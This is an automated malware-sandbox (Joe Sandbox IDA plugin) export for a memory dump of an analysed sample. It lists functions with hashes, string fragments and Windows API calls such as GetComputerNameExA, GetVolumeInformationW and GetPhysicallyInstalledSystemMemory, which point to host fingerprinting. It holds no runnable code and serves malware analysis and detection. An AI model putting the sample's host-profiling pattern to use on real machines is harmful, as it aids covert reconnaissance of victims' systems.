Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: 0Uwk$2E&[$2I=O$4Q3W$:M?C$;]!S$=Y,_$A!R'$J9?$U-E#$X)R/$]%I;$bpwv$btw~$ojz.$vino$}A3G
API String ID: 0-3347885647
Opcode ID: 8710fd8064c41e9ba1a3b60ff32915164b4a8c05e1095c3369b47da649e00c36
Instruction ID: 9722ecf81c885f8c6de543865864230810563c2853354d4eca10c10061eace28
Opcode Fuzzy Hash: 8710fd8064c41e9ba1a3b60ff32915164b4a8c05e1095c3369b47da649e00c36
Instruction Fuzzy Hash: 6EA114B5A8D3D28BD738CF20D8907EBBBE1ABD6304F19896CD4D94B341D6750846CB92

Function 00AC8690 Relevance: 18.1, APIs: 5, Strings: 5, Instructions: 584
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(994B9B42), ref: 00AC8831
CoSetProxyBlanket.COMBASE(859C6334,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00AC887B
GetVolumeInformationW.KERNEL32(?,00000000,00000000,19C71BF7,00000000,00000000,00000000,00000000), ref: 00AC8D1D

Strings

\, xrefs: 00AC8733
S", xrefs: 00AC86BF
XI, xrefs: 00AC86B7
C, xrefs: 00AC872B
R], xrefs: 00AC86C7

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: AllocBlanketInformationProxyStringVolume
String ID: C$R]$S"$XI$\
API String ID: 2230333033-1386815641
Opcode ID: 1e9e3ade3a5fa5cbe87af1f2e8647b87e5621697891f1dc62fd999230af8968c
Instruction ID: 86e156bd7dd63329332b70d918e8eaebdffcb5d606f715fdd2fbc076b38b814d
Opcode Fuzzy Hash: 1e9e3ade3a5fa5cbe87af1f2e8647b87e5621697891f1dc62fd999230af8968c
Instruction Fuzzy Hash: 7A1211716483019FE710CF64C881B6BFBE1FF96350F198A2CE5949B291DB78D845CB92

Function 00AA151A Relevance: 16.9, Strings: 13, Instructions: 662
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X, xrefs: 00AA1C01
=, xrefs: 00AA1B41
^, xrefs: 00AA15FB
|, xrefs: 00AA1CA4
h, xrefs: 00AA1528
F, xrefs: 00AA1737
o, xrefs: 00AA1C9C
G, xrefs: 00AA184F
!, xrefs: 00AA173F
i, xrefs: 00AA1CAC
T, xrefs: 00AA1C11
W, xrefs: 00AA1C09
r, xrefs: 00AA1931

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: !$=$F$G$T$W$X$^$h$i$o$r$|
API String ID: 0-3969503238
Opcode ID: f9b1193fcdaead1a214876e95102e3a5ae1cef82a0693eea4d1b3e7561bd5092
Instruction ID: 7097ccfe2012e01fe4b0b20687b93c92e78cb0cced70415455d6aaaeab6855c7
Opcode Fuzzy Hash: f9b1193fcdaead1a214876e95102e3a5ae1cef82a0693eea4d1b3e7561bd5092
Instruction Fuzzy Hash: DC42D772A0C7908BD7289B38C5953AFBBE1ABD6324F194A3DD4D9C73C2D77988408742

Function 00AB19C0 Relevance: 13.1, Strings: 10, Instructions: 618
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3, xrefs: 00AB1C43
2, xrefs: 00AB1C3E
<, xrefs: 00AB1E23
A, xrefs: 00AB207B
1, xrefs: 00AB1E32
1, xrefs: 00AB1C39
=, xrefs: 00AB1E2D
$, xrefs: 00AB1E28
!@, xrefs: 00AB19F6
,, xrefs: 00AB1FD9

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: AllocateHeap
String ID: !@$$$,$1$1$2$3$<$=$A
API String ID: 1279760036-1832068457
Opcode ID: 5d423225e829fa5d4ab8af198bb32614b17e0a974d6c6688b73cf4f8366e6c00
Instruction ID: 06062daf844921a944cd2f84c50f7f3e5a281ad0db63a781163229c57abd03c8
Opcode Fuzzy Hash: 5d423225e829fa5d4ab8af198bb32614b17e0a974d6c6688b73cf4f8366e6c00
Instruction Fuzzy Hash: FD32F37160C3808FD324CB28C4953AFBBE5ABC5314F598A2EE5E587392D7798845CB43

Function 00AB3730 Relevance: 13.0, Strings: 10, Instructions: 534
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

wi, xrefs: 00AB3BE4
aw, xrefs: 00AB3BD4
CE, xrefs: 00AB3A8B
wy, xrefs: 00AB3A33
ag, xrefs: 00AB3BCC
G&I, xrefs: 00AB3A93
\&, xrefs: 00AB375A
{}, xrefs: 00AB3A3B
|}, xrefs: 00AB3DB1
yu, xrefs: 00AB3BDC

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: \&$ag$aw$wi$yu$|}$CE$G&I$wy${}
API String ID: 0-63213732
Opcode ID: 0de5236d70e3740e2ee39dd8a45a3d16d0439af2fae05215b06a6cfadd3ac588
Instruction ID: cefe9b4e11098d485e6e14361a85c7d3e43002b23ecf3302c0b72fda6469cb4c
Opcode Fuzzy Hash: 0de5236d70e3740e2ee39dd8a45a3d16d0439af2fae05215b06a6cfadd3ac588
Instruction Fuzzy Hash: C202EFB16093409FD714CF68D85266FBBE5EBC1314F18892DF5D68B391E7788905CB82

Function 00AB3247 Relevance: 12.1, Strings: 9, Instructions: 814
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

wi, xrefs: 00AB3BE4
aw, xrefs: 00AB3BD4
CE, xrefs: 00AB3A8B
wy, xrefs: 00AB3A33
ag, xrefs: 00AB3BCC
G&I, xrefs: 00AB3A93
{}, xrefs: 00AB3A3B
|}, xrefs: 00AB3DB1
yu, xrefs: 00AB3BDC

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: ag$aw$wi$yu$|}$CE$G&I$wy${}
API String ID: 0-1554855913
Opcode ID: 93267db1e8481f2238dc01f77d5a149662c5f73b797abf53ab08f50e2d66330b
Instruction ID: b503ed81ae4979b7a9073fdd8687f41312ca743a624f555d11b48ca7cd1fa4d4
Opcode Fuzzy Hash: 93267db1e8481f2238dc01f77d5a149662c5f73b797abf53ab08f50e2d66330b
Instruction Fuzzy Hash: F852EF72A09201CFDB08CF68D8516AEBBF5FF85314F19896DE4969B391E734D902CB42

Function 00AB32E2 Relevance: 12.0, Strings: 9, Instructions: 744
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

wi, xrefs: 00AB3BE4
aw, xrefs: 00AB3BD4
CE, xrefs: 00AB3A8B
wy, xrefs: 00AB3A33
ag, xrefs: 00AB3BCC
G&I, xrefs: 00AB3A93
{}, xrefs: 00AB3A3B
|}, xrefs: 00AB3DB1
yu, xrefs: 00AB3BDC

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: ag$aw$wi$yu$|}$CE$G&I$wy${}
API String ID: 0-1554855913
Opcode ID: 7217f2810cf8f0ce06fc0142794f31b0ce0828eef243af44574bee620b63168e
Instruction ID: 06f07eae56b5343a413e6c764ff9f4b991632fdd88e512ffe7d58e7a161f2435
Opcode Fuzzy Hash: 7217f2810cf8f0ce06fc0142794f31b0ce0828eef243af44574bee620b63168e
Instruction Fuzzy Hash: 0942EFB2A09301CFDB04CF68D8416AEBBF5FB85314F19896DE4969B391E734D902CB42

Function 00ABC4D7 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 500
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNEL32(00000006,00000000,00000200), ref: 00ABC50D
GetComputerNameExA.KERNEL32(00000005,00000000,00000200), ref: 00ABC5E5

Strings

hzK, xrefs: 00ABC968
UgYn, xrefs: 00ABCA51
QZS9, xrefs: 00ABCA5B
u u#, xrefs: 00ABCD38

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: ComputerName
String ID: hzK$QZS9$UgYn$u u#
API String ID: 3545744682-1715210810
Opcode ID: e1de05e0a0799466fab7a709a7f6a454b54195d44f1ce47e060954122ff518d1
Instruction ID: cfe61196356f8ece297b0543c8f8f8fcaa2d8548c8af3f9cf8342099b67c54bf
Opcode Fuzzy Hash: e1de05e0a0799466fab7a709a7f6a454b54195d44f1ce47e060954122ff518d1
Instruction Fuzzy Hash: 15F1C360604B818FE725CF35C451BA3BBE6EF56310F08896DC4EA8B383D779A50ADB51

Function 00A9B890 Relevance: 5.4, Strings: 4, Instructions: 442
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6(>*, xrefs: 00A9BC5D
=:, xrefs: 00A9BC55
VY^_, xrefs: 00A9B9F2
2$1., xrefs: 00A9BC80

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: 2$1.$6(>*$=:$VY^_
API String ID: 0-408715646
Opcode ID: ab65c13b376d8026eb076f117a6d57ea163a77037b82283457420e94463dbe9d
Instruction ID: 20ae8b978df92899bf63dea19dac12854354d4210c0c5dfa30ab21d54a731319
Opcode Fuzzy Hash: ab65c13b376d8026eb076f117a6d57ea163a77037b82283457420e94463dbe9d
Instruction Fuzzy Hash: 35D1387171C3908BD714CF29D99136BBBE2EBD1314F18892CE4D58B395DB79880ACB92

Function 00ABC6B7 Relevance: 3.9, Strings: 3, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

eT`/, xrefs: 00ABC832
}!, xrefs: 00ABC707
}!, xrefs: 00ABC846

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: eT`/$}!$}!
API String ID: 0-2324184320
Opcode ID: fecf339f1f0656dea2b723fa6fce5532ae43c9008d264da6a6ed041d864ac73c
Instruction ID: f82107c633b7b6501452b6accfa88f5c06190c5ad75a740fb08b5a30ef93bc60
Opcode Fuzzy Hash: fecf339f1f0656dea2b723fa6fce5532ae43c9008d264da6a6ed041d864ac73c
Instruction Fuzzy Hash: 4F512AB56057805FD7298F35C861BF3BFD2ABA6311F0984ADD0EB87692CB3925058B21

Function 00ABCD4F Relevance: 1.9, APIs: 1, Instructions: 352COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 00ABD13B

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID:
API String ID: 3960555810-0
Opcode ID: e21421c7c73f9208c3b3212e1ba547df7b80c3e5cb3b61f659472a9171e3ef7b
Instruction ID: 3f679b2aa000f48fa0277d8bc3d9e2f45ef954ccb89586be2b85e0f82a95bd0f
Opcode Fuzzy Hash: e21421c7c73f9208c3b3212e1ba547df7b80c3e5cb3b61f659472a9171e3ef7b
Instruction Fuzzy Hash: 21B18574508B918ED726CF3980607A3BFE5AF57304F1489AEC0EB8B693D735A50ACB51

Function 00ABD052 Relevance: 1.8, APIs: 1, Instructions: 316COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 00ABD13B

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID:
API String ID: 3960555810-0
Opcode ID: 693df76ee043fd714e5d19c171c96d1c686716f9b7bb6faeada50affee4e16e5
Instruction ID: cad2b500c392f5c856e18faedad46d94f43f341e39574d16bcce094334dbeefb
Opcode Fuzzy Hash: 693df76ee043fd714e5d19c171c96d1c686716f9b7bb6faeada50affee4e16e5
Instruction Fuzzy Hash: 54A18474508B918FD72ACF3A80507A3BBE1AF57314F14896EC0EB4B693D736A50ACB51

Function 00ABD067 Relevance: 1.8, APIs: 1, Instructions: 310COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 00ABD13B

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
